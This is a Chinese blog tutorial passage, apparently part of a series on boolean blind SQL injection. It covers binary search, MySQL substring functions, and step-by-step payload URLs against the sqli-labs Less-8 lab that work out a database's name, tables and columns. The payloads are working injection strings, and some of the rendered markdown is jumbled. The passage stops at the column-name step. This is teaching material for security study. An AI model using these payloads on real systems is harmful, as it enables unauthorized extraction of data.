<!DOCTYPE html>
<html lang=zh>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="utf-8">
  
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, minimal-ui">
  <meta name="renderer" content="webkit">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black">
  <meta name="format-detection" content="telephone=no,email=no,adress=no">
  <!-- Color theme for statusbar -->
  <meta name="theme-color" content="#000000">
  <!-- 强制页面在当前窗口以独立页面显示,防止别人在框架里调用页面 -->
  <meta http-equiv="window-target" content="_top">
  
  
  <title>高级注入（二） | Hexo</title>
  <meta name="description" content="三、 SQL盲注的利用3.1 二分法3.1.1 二分法定义​        二分法查找又称折半查找。二分法查找是在一个有序列表的基础上完成的。要查找的值x和列表的中间值m作比较，若x大于m，那么接下来从m+1的右区间内再以相同的方法取中间值作比较，循环往复此过程知道判断出x=m时即查找成功，否则相反，返回类型为布尔类型。 ​        时间复杂度为：O(logn) 空间复杂度： O(1) 3.">
<meta name="keywords" content="SQL注入">
<meta property="og:type" content="article">
<meta property="og:title" content="高级注入（二）">
<meta property="og:url" content="https://Greetdawn.github.io/2020/03/09/高级注入（二）.html">
<meta property="og:site_name" content="Mr.zhang&#39;s Blog">
<meta property="og:description" content="三、 SQL盲注的利用3.1 二分法3.1.1 二分法定义​        二分法查找又称折半查找。二分法查找是在一个有序列表的基础上完成的。要查找的值x和列表的中间值m作比较，若x大于m，那么接下来从m+1的右区间内再以相同的方法取中间值作比较，循环往复此过程知道判断出x=m时即查找成功，否则相反，返回类型为布尔类型。 ​        时间复杂度为：O(logn) 空间复杂度： O(1) 3.">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/00831rSTgy1gcnfv30u0fj30c604vt9a.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/image-20200110102553443.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/image-20200110105745270.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/image-20200110155015000.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/image-20200110155241376.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/image-20200110160414589.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/image-20200113092421664.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/image-20200115134828024.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/image-20200115134945393.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/00831rSTgy1gcnfuxq7y8j327y0hstcn.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/image-20200115135901211.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/00831rSTgy1gcnfv27xf3j327y0q8ng6.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/image-20200115145329352.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/image-20200115152625643.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/image-20200115152729849.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/00831rSTgy1gcnfvb5wchj327y0oenfn.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/image-20200115155032310.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/image-20200115154205101.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/image-20200115154245368.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/image-20200115161737187.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/00831rSTgy1gcnfvcfg3qj31u20okjub.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/image-20200120161504245.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/image-20200120161602087.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/00831rSTgy1gcnfuy1ghsj327y0hstcn.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/00831rSTgy1gcnfv9cdbej31t10u0tte.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/00831rSTgy1gcnfuz238wj31su0u0aun.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/image-20200120164446906.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/image-20200120164914497.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/image-20200120165029898.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/00831rSTgy1gcnfuzy9p1j31sj0u0qnj.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/00831rSTgy1gcnfv4neo0j31ro0u0kc1.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/image-20200121111207067.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/image-20200121111422842.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/image-20200121111905166.png">
<meta property="og:image" content="https://tva1.sinaimg.cn/large/00831rSTgy1gcnfv0w9fdj31u00u0avt.jpg">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/00831rSTgy1gcnfv58gu9j31rv0u0nji.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/00831rSTgy1gcnfv6jkfoj31vu0u01fn.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/image-20200210134818728.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/image-20200210135002727.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/00831rSTgy1gcnfv71m85j31u20u01e7.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/image-20200210135402577.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/image-20200210135530847.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/image-20200210135815529.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/00831rSTgy1gcnfv184n7j327y0qyh5e.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/image-20200211152812564.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/image-20200211154642052.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/00831rSTgy1gcnfv7v5d3j327y0oingx.png">
<meta property="og:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/00831rSTgy1gcnfva9c4pj327y0pu4ib.png">
<meta property="og:updated_time" content="2020-03-09T02:12:32.873Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="高级注入（二）">
<meta name="twitter:description" content="三、 SQL盲注的利用3.1 二分法3.1.1 二分法定义​        二分法查找又称折半查找。二分法查找是在一个有序列表的基础上完成的。要查找的值x和列表的中间值m作比较，若x大于m，那么接下来从m+1的右区间内再以相同的方法取中间值作比较，循环往复此过程知道判断出x=m时即查找成功，否则相反，返回类型为布尔类型。 ​        时间复杂度为：O(logn) 空间复杂度： O(1) 3.">
<meta name="twitter:image" content="https://greetdawn.github.io/2020/03/09/高级注入（二）/00831rSTgy1gcnfv30u0fj30c604vt9a.png">
  <!-- Canonical links -->
  <link rel="canonical" href="https://Greetdawn.github.io/2020/03/09/高级注入（二）.html">
  
    <link rel="alternate" href="/atom.xml" title="Mr.zhang&#39;s Blog" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png" type="image/x-icon">
  
  <link rel="stylesheet" href="/css/style.css">
  
  
  
  
</head>


<body class="main-center" itemscope itemtype="http://schema.org/WebPage">
  <header class="header" itemscope itemtype="http://schema.org/WPHeader">
  <div class="slimContent">
    <div class="navbar-header">
      
      
      <div class="profile-block text-center">
        <a id="avatar" href="https://github.com/cofess" target="_blank">
          <img class="img-circle img-rotate" src="/images/avatar.jpg" width="200" height="200">
        </a>
        <h2 id="name" class="hidden-xs hidden-sm">昵称</h2>
        <h3 id="title" class="hidden-xs hidden-sm hidden-md">Web Developer &amp; Designer</h3>
        <small id="location" class="text-muted hidden-xs hidden-sm"><i class="icon icon-map-marker"></i> Shenzhen, China</small>
      </div>
      
      <div class="search" id="search-form-wrap">

    <form class="search-form sidebar-form">
        <div class="input-group">
            <input type="text" class="search-form-input form-control" placeholder="搜索" />
            <span class="input-group-btn">
                <button type="submit" class="search-form-submit btn btn-flat" onclick="return false;"><i class="icon icon-search"></i></button>
            </span>
        </div>
    </form>
    <div class="ins-search">
  <div class="ins-search-mask"></div>
  <div class="ins-search-container">
    <div class="ins-input-wrapper">
      <input type="text" class="ins-search-input" placeholder="想要查找什么..." x-webkit-speech />
      <button type="button" class="close ins-close ins-selectable" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
    </div>
    <div class="ins-section-wrapper">
      <div class="ins-section-container"></div>
    </div>
  </div>
</div>


</div>
      <button class="navbar-toggle collapsed" type="button" data-toggle="collapse" data-target="#main-navbar" aria-controls="main-navbar" aria-expanded="false">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
    </div>
    <nav id="main-navbar" class="collapse navbar-collapse" itemscope itemtype="http://schema.org/SiteNavigationElement" role="navigation">
      <ul class="nav navbar-nav main-nav ">
        
        
        <li class="menu-item menu-item-home">
          <a href="/.">
            
            <i class="icon icon-home-fill"></i>
            
            <span class="menu-title">首页</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-archives">
          <a href="/archives">
            
            <i class="icon icon-archives-fill"></i>
            
            <span class="menu-title">归档</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-categories">
          <a href="/categories">
            
            <i class="icon icon-folder"></i>
            
            <span class="menu-title">分类</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-tags">
          <a href="/tags">
            
            <i class="icon icon-tags"></i>
            
            <span class="menu-title">标签</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-repository">
          <a href="/repository">
            
            <i class="icon icon-project"></i>
            
            <span class="menu-title">项目</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-books">
          <a href="/books">
            
            <i class="icon icon-book-fill"></i>
            
            <span class="menu-title">书单</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-links">
          <a href="/links">
            
            <i class="icon icon-friendship"></i>
            
            <span class="menu-title">友链</span>
          </a>
        </li>
        
        
        <li class="menu-item menu-item-about">
          <a href="/about">
            
            <i class="icon icon-cup-fill"></i>
            
            <span class="menu-title">关于</span>
          </a>
        </li>
        
      </ul>
      
	
    <ul class="social-links">
    	
        <li><a href="https://github.com/cofess" target="_blank" title="Github" data-toggle=tooltip data-placement=top><i class="icon icon-github"></i></a></li>
        
        <li><a href="http://weibo.com/cofess" target="_blank" title="Weibo" data-toggle=tooltip data-placement=top><i class="icon icon-weibo"></i></a></li>
        
        <li><a href="https://twitter.com/iwebued" target="_blank" title="Twitter" data-toggle=tooltip data-placement=top><i class="icon icon-twitter"></i></a></li>
        
        <li><a href="https://www.behance.net/cofess" target="_blank" title="Behance" data-toggle=tooltip data-placement=top><i class="icon icon-behance"></i></a></li>
        
        <li><a href="/atom.xml" target="_blank" title="Rss" data-toggle=tooltip data-placement=top><i class="icon icon-rss"></i></a></li>
        
    </ul>

    </nav>
  </div>
</header>

  
    <aside class="sidebar" itemscope itemtype="http://schema.org/WPSideBar">
  <div class="slimContent">
    
      <div class="widget">
    <h3 class="widget-title">公告</h3>
    <div class="widget-body">
        <div id="board">
            <div class="content">
                <p>欢迎交流与分享经验!</p>
            </div>
        </div>
    </div>
</div>

    
      
  <div class="widget">
    <h3 class="widget-title">分类</h3>
    <div class="widget-body">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/Web安全/">Web安全</a><span class="category-list-count">4</span></li></ul>
    </div>
  </div>


    
      
  <div class="widget">
    <h3 class="widget-title">标签</h3>
    <div class="widget-body">
      <ul class="tag-list"><li class="tag-list-item"><a class="tag-list-link" href="/tags/SQL注入/">SQL注入</a><span class="tag-list-count">4</span></li></ul>
    </div>
  </div>


    
      
  <div class="widget">
    <h3 class="widget-title">标签云</h3>
    <div class="widget-body tagcloud">
      <a href="/tags/SQL注入/" style="font-size: 13px;">SQL注入</a>
    </div>
  </div>

    
      
  <div class="widget">
    <h3 class="widget-title">归档</h3>
    <div class="widget-body">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/03/">三月 2020</a><span class="archive-list-count">4</span></li></ul>
    </div>
  </div>


    
      
  <div class="widget">
    <h3 class="widget-title">最新文章</h3>
    <div class="widget-body">
      <ul class="recent-post-list list-unstyled no-thumbnail">
        
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/Web安全/">Web安全</a>
              </p>
              <p class="item-title">
                <a href="/2020/03/09/高级注入（三）.html" class="title">高级注入（三）</a>
              </p>
              <p class="item-date">
                <time datetime="2020-03-09T05:35:41.000Z" itemprop="datePublished">2020-03-09</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/Web安全/">Web安全</a>
              </p>
              <p class="item-title">
                <a href="/2020/03/09/高级注入（二）.html" class="title">高级注入（二）</a>
              </p>
              <p class="item-date">
                <time datetime="2020-03-09T01:41:11.000Z" itemprop="datePublished">2020-03-09</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/Web安全/">Web安全</a>
              </p>
              <p class="item-title">
                <a href="/2020/03/08/高级注入（一）.html" class="title">高级注入（一）</a>
              </p>
              <p class="item-date">
                <time datetime="2020-03-08T11:32:54.000Z" itemprop="datePublished">2020-03-08</time>
              </p>
            </div>
          </li>
          
          <li>
            
            <div class="item-inner">
              <p class="item-category">
                <a class="category-link" href="/categories/Web安全/">Web安全</a>
              </p>
              <p class="item-title">
                <a href="/2020/03/07/基于sql布尔盲注的python脚本开发.html" class="title">基于sql布尔盲注的python脚本开发</a>
              </p>
              <p class="item-date">
                <time datetime="2020-03-07T08:04:26.000Z" itemprop="datePublished">2020-03-07</time>
              </p>
            </div>
          </li>
          
      </ul>
    </div>
  </div>
  

    
  </div>
</aside>

  
  
<main class="main" role="main">
  <div class="content">
  <article id="post-高级注入（二）" class="article article-type-post" itemscope itemtype="http://schema.org/BlogPosting">
    
    <div class="article-header">
      
        
  
    <h1 class="article-title" itemprop="name">
      高级注入（二）
    </h1>
  

      
      <div class="article-meta">
        <span class="article-date">
    <i class="icon icon-calendar-check"></i>
	<a href="/2020/03/09/高级注入（二）.html" class="article-date">
	  <time datetime="2020-03-09T01:41:11.000Z" itemprop="datePublished">2020-03-09</time>
	</a>
</span>
        
  <span class="article-category">
    <i class="icon icon-folder"></i>
    <a class="article-category-link" href="/categories/Web安全/">Web安全</a>
  </span>

        
  <span class="article-tag">
    <i class="icon icon-tags"></i>
	<a class="article-tag-link" href="/tags/SQL注入/">SQL注入</a>
  </span>


        

        <span class="post-comment"><i class="icon icon-comment"></i> <a href="/2020/03/09/高级注入（二）.html#comments" class="article-comment-link">评论</a></span>
        
      </div>
    </div>
    <div class="article-entry marked-body" itemprop="articleBody">
      
        <h1 id="三、-SQL盲注的利用"><a href="#三、-SQL盲注的利用" class="headerlink" title="三、 SQL盲注的利用"></a>三、 SQL盲注的利用</h1><h2 id="3-1-二分法"><a href="#3-1-二分法" class="headerlink" title="3.1 二分法"></a>3.1 二分法</h2><h3 id="3-1-1-二分法定义"><a href="#3-1-1-二分法定义" class="headerlink" title="3.1.1 二分法定义"></a>3.1.1 二分法定义</h3><p>​        二分法查找又称折半查找。二分法查找是在一个有序列表的基础上完成的。要查找的值x和列表的中间值m作比较，若x大于m，那么接下来从m+1的右区间内再以相同的方法取中间值作比较，循环往复此过程知道判断出x=m时即查找成功，否则相反，返回类型为布尔类型。</p>
<p>​        时间复杂度为：O(logn) 空间复杂度： O(1)</p>
<h3 id="3-1-2-二分法实例"><a href="#3-1-2-二分法实例" class="headerlink" title="3.1.2 二分法实例"></a>3.1.2 二分法实例</h3><blockquote>
<p>现有一个游戏场景，一个聚会当中，一个人在1-100以内的数中随机取出一个数，然后让其他人来猜，可以告诉猜大了或是猜小了，然后直到猜出这个数为止。</p>
</blockquote>
<p><strong>python代码实现如下：</strong></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#/usr/bin/env python3</span></span><br><span class="line"><span class="comment">#Author:Mr.zhang</span></span><br><span class="line"><span class="comment">#Data:2020-1-9</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">BinarySearch</span><span class="params">(list1, num)</span>:</span></span><br><span class="line"></span><br><span class="line">    min = <span class="number">0</span>               <span class="comment"># 最小的下标</span></span><br><span class="line">    max = len(list1) - <span class="number">1</span>  <span class="comment"># 最大的下标</span></span><br><span class="line">    i = <span class="number">0</span></span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        i += <span class="number">1</span></span><br><span class="line">        mid = (max + min) // <span class="number">2</span> <span class="comment"># 中间的下标每次向下取整</span></span><br><span class="line">        <span class="keyword">if</span> num &gt; list1[mid] :</span><br><span class="line">            min = mid + <span class="number">1</span>  <span class="comment"># 小于需要的猜的数，则将最小下标变为中间的，又因为中间的已经猜过，所以要加1</span></span><br><span class="line">        <span class="keyword">elif</span> num == list1[mid] :</span><br><span class="line">            print(<span class="string">"找到数据"</span>)</span><br><span class="line">            print(<span class="string">"一共查找%d次"</span>%i)</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">        <span class="keyword">else</span> :</span><br><span class="line">            max = mid - <span class="number">1</span>  <span class="comment"># 大于需要的猜的数，则将最大下标变为中间的，又因为中间的已经猜过，所以要减1</span></span><br><span class="line">        </span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line">    </span><br><span class="line">    list1 = [i <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">100</span>)]</span><br><span class="line">    num = <span class="number">83</span></span><br><span class="line">    BinarySearch(list1, num)</span><br></pre></td></tr></table></figure>
<h2 id="3-2-布尔盲注"><a href="#3-2-布尔盲注" class="headerlink" title="3.2 布尔盲注"></a>3.2 布尔盲注</h2><h3 id="3-2-1-常用函数详解"><a href="#3-2-1-常用函数详解" class="headerlink" title="3.2.1 常用函数详解"></a>3.2.1 常用函数详解</h3><p><strong>mid()函数</strong></p>
<p><strong>作用：</strong>截取字符串的一部分</p>
<p><strong>使用格式：</strong>mid(column_name,start,length)</p>
<p><img src="/2020/03/09/高级注入（二）/00831rSTgy1gcnfv30u0fj30c604vt9a.png" alt></p>
<p>在盲注中对数据库中信息进行猜解时，使用该函数进行逐位或者多位猜解：</p>
<p><img src="/2020/03/09/高级注入（二）/image-20200110102553443.png" alt="image-20200110102553443"></p>
<p>可以在mid函数的column_name插入完整的sql语句,需要用括号将sql语句括起来：</p>
<p><img src="/2020/03/09/高级注入（二）/image-20200110105745270.png" alt="image-20200110105745270"></p>
<p><strong>substr()函数</strong></p>
<p><strong>作用：</strong>substr()和substring()函数实现的功能是一样的，都是截取字符串．</p>
<p><strong>使用格式：</strong>string substr(string, start, length)；其参数含义和mid()函数一样．</p>
<p><img src="/2020/03/09/高级注入（二）/image-20200110155015000.png" alt="image-20200110155015000"></p>
<p><strong>left()函数</strong></p>
<p><strong>作用：</strong>截取字符串从左边开始指定个数的字符；</p>
<p><strong>使用格式：</strong>left ( string, n ), string: 要截取的字符串，n: 长度;</p>
<p><img src="/2020/03/09/高级注入（二）/image-20200110155241376.png" alt="image-20200110155241376"></p>
<p><strong>ord()函数</strong></p>
<p><strong>作用：</strong>返回第一个字符(指start的值)的ASCII码（也可以使用ascii()函数)，一般与上面的函数组合使用</p>
<p><strong>使用格式：</strong>mid(concent,start,length); 其参数含义和mid()函数一样</p>
<p>D的ascii码值为68</p>
<p><img src="/2020/03/09/高级注入（二）/image-20200110160414589.png" alt="image-20200110160414589"></p>
<p><strong>regexp正则注入</strong></p>
<p><strong>作用：</strong>使用正则表达式匹配表</p>
<p><strong>使用格式:</strong> regexp ‘表达式’</p>
<p><img src="/2020/03/09/高级注入（二）/image-20200113092421664.png" alt="image-20200113092421664"></p>
<p>如果符合正则匹配，则显示前面sql语句执行的结果；反之则会显示<figure class="highlight plain"><figcaption><span>set```.通常使用```limit 0,1```只显示第一条数据．</span></figcaption><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">![image-20200113100425526](高级注入（二）/00831rSTgy1gcnfv5ty9lj31u808w764.png)</span><br><span class="line"></span><br><span class="line">**like**</span><br><span class="line"></span><br><span class="line">**作用：** 和regexp正则注入类似</span><br><span class="line"></span><br><span class="line">![image-20200113100628303](高级注入（二）/image-20200113100628303.png)</span><br><span class="line">![image-20200113100708046](高级注入（二）/image-20200113100708046.png)</span><br><span class="line"></span><br><span class="line">### 3.2.2 猜解库名</span><br><span class="line"></span><br><span class="line">​	根据注入点判断测试，发现存在布尔盲注，进行库名拆解。利用sqlilab的实验8进行相应实验测试，我们发现布尔盲注在正常请求页面的情况下，页面显示&quot;You are in...&quot;字符串；查询数据错误时，页面没有任何数据信息显示，以此为判断依据进行判断。</span><br><span class="line"></span><br><span class="line">**第一步：判断数据库库名的长度**</span><br><span class="line"></span><br><span class="line">`http://192.168.55.107:8080/Less-8/?id=1&apos; and  length(database())&gt;7--+`</span><br><span class="line"></span><br><span class="line">测试库名大于7时，页面数据正常回显，如下图所示：</span><br><span class="line"></span><br><span class="line">![image-20200113104930395](高级注入（二）/image-20200113104930395.png)</span><br><span class="line"></span><br><span class="line">测试库名大于8时，页面数据没有没有回显，如下图所示：</span><br><span class="line"></span><br><span class="line">![image-20200113105111766](高级注入（二）/image-20200113105111766.png)</span><br><span class="line"></span><br><span class="line">由此可判断，数据存在一个临界值，这个值即为当前数据库库名的长度，长度为8</span><br><span class="line"></span><br><span class="line">**第二步：判断数据库的库名**</span><br><span class="line"></span><br><span class="line">`http://192.168.55.107:8080/Less-8/?id=1&apos; and  ascii(substr(database(),1,1))&gt;114--+`</span><br><span class="line"></span><br><span class="line">由第一步已知当前数据库的库名长度为8，判断库名的第一位的ascii的值进行比较，当测试值为114时，当前页面数据正常回显，如下图所示:</span><br><span class="line"></span><br><span class="line">![image-20200113110947331](高级注入（二）/image-20200113110947331.png)</span><br><span class="line"></span><br><span class="line">当测试值为115时，当前页面数据回显结果为空，如下图所示：</span><br><span class="line"></span><br><span class="line">![image-20200113111046067](高级注入（二）/image-20200113111046067.png)</span><br><span class="line"></span><br><span class="line">由此可判断，数据存在一个临界值，这个值即为当前库名第一位的ascii值为115，对应字符为s</span><br><span class="line"></span><br><span class="line">以此类推判断当前库名的后续字符值，获取当前数据库的库名。</span><br><span class="line"></span><br><span class="line">### 3.2.3 猜解表名</span><br><span class="line"></span><br><span class="line">**第一步:拆解当前数据库中表的数量**</span><br></pre></td></tr></table></figure></p>
<p><a href="http://192.168.55.106:8080/Less-8/?id=1&#39;" target="_blank" rel="noopener">http://192.168.55.106:8080/Less-8/?id=1&#39;</a> and (select count(table_name) from information_schema.tables where table_schema=’security’) &gt;3–+<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">由前序步骤可知，当前数据库的库名为&quot;security&quot;,判断当前库下表的数量，当带入值为3时，当前页面数据正常回显，如下图所示：</span><br><span class="line"></span><br><span class="line">![image-20200115133524556](高级注入（二）/image-20200115133524556.png)</span><br><span class="line"></span><br><span class="line">当测试值为4时，当前页面数据回显结果为空，如下图所示：</span><br><span class="line"></span><br><span class="line">![image-20200115133656165](高级注入（二）/00831rSTgy1gcnfvcykctj327y0ioq6t.png)</span><br><span class="line"></span><br><span class="line">由此可判断，数据存在一个临界值，这个值即为当前库下表的数量为4。</span><br><span class="line"></span><br><span class="line">**第二步:拆解当前数据库中其中一个表的表名**</span><br><span class="line"></span><br><span class="line">```sql</span><br><span class="line">http://192.168.55.106:8080/Less-8/?id=1&apos; and ascii(substr((select table_name from information_schema.tables where table_schema=&apos;security&apos; limit 0,1),1,1)) &gt; 100--+</span><br></pre></td></tr></table></figure></p>
<p>由前序步骤可知，当前数据库的库名为”security”,当前库中表的数量为4，判断当前库中第一表表名的第一字母，当带入值为100时，当前页面数据正常回显，如下图所示：</p>
<p><img src="/2020/03/09/高级注入（二）/image-20200115134828024.png" alt="image-20200115134828024"></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.55.106:8080/Less-8/?id=1' and ascii(substr((<span class="keyword">select</span> table_name <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema=<span class="string">'security'</span> <span class="keyword">limit</span> <span class="number">0</span>,<span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>)) &gt; <span class="number">101</span><span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>当带入值为101时，当前页面数据回显为空，如下图所示：</p>
<p><img src="/2020/03/09/高级注入（二）/image-20200115134945393.png" alt="image-20200115134945393"></p>
<p>由此可判断，数据存在一个临界值，这个值即为当前表名第一位的ascii值为101，对应字符为e</p>
<p>以此类推判断当前表名的后续字符值，获取当前数据库中的第一个表名。</p>
<h3 id="3-2-4-猜解字段名"><a href="#3-2-4-猜解字段名" class="headerlink" title="3.2.4 猜解字段名"></a>3.2.4 猜解字段名</h3><p><strong>第一步:拆解表中字段的数量</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.55.106:8080/Less-8/?id=1&apos; and (select count(column_name) from information_schema.columns where table_schema=&apos;security&apos; and table_name=&apos;emails&apos;) &gt; 1--+</span><br></pre></td></tr></table></figure>
<p>由前序步骤可知，当前数据库的库名为”security”、第一个表名为”emails”,判断当前库下表的数量。</p>
<p>当带入值为1时，当前页面数据正常回显，如下图所示：</p>
<p><img src="/2020/03/09/高级注入（二）/00831rSTgy1gcnfuxq7y8j327y0hstcn.png" alt="image-20200115135736800"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://192.168.55.106:8080/Less-8/?id=1&apos; and (select count(column_name) from information_schema.columns where table_schema=&apos;security&apos; and table_name=&apos;emails&apos;) &gt; 2--+</span><br></pre></td></tr></table></figure>
<p>当带入值为2时，当前页面数据回显为空，如下图所示：</p>
<p><img src="/2020/03/09/高级注入（二）/image-20200115135901211.png" alt="image-20200115135901211"></p>
<p>由此可判断，数据存在一个临界值，这个值即为当前emails表中字段的数量为2。</p>
<p><strong>第二步:拆解表中字段的第一个字段的名称</strong></p>
